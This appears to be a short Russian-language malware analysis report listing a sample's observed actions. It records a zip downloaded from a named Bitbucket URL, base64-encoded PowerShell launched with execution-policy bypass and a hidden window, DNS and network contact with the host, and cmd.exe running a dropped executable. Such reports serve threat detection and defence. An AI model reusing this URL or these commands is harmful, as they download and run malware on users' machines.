Техническая информация
- https://bitbucket.org/rubenvvvvv/word/downloads/1111.zip как c:\\temp\\newfile.zip
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e cABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAGIAeQBwAGEAcwBzACAALQBuAG8AcAByAG8AZgBpAGwAZQAgAC0AdwBpAG4AZABvAHcAcwB0AHkAbABlACAAaABpAGQAZABlAG4AIAAtAG...
- 'bi###cket.org':443
- 'bi###cket.org':443
- DNS ASK bi###cket.org
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e cABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAGIAeQBwAGEAcwBzACAALQBuAG8AcAByAG8AZgBpAGwAZQAgAC0AdwBpAG4AZABvAHcAcwB0AHkAbABlACAAaABpAGQAZABlAG4AIAAtAG...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c C:\\Temp\\1111.exe